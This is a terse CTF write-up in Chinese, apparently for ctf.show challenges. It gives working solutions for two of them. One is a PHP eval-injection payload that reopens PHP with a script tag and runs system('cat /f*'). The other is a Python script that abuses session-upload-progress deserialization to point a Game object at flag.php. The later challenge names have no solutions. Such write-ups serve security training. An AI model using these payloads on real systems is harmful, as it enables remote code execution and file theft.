easy_eval
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
if(isset($code)){
$code = str_replace("?","",$code);
eval("?>".$code);
}
eval("?>".$code);闭合了php我们使用script重新开启
code=<script language="php">system('cat /f*');</script>
剪刀石头布
session 反序列化
import requests
url="https://75ddb6b9-251a-4738-a8de-e8574f54d864.challenge.ctf.show/"
sess="yu22x"
data={'PHP_SESSION_UPLOAD_PROGRESS':'|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}'}
files={'file':'1'}
r = requests.post(url,data=data,files=files,cookies={'PHPSESSID':'yu22x'})
print(r.text)
baby_pickle
repairman
简单的数据分析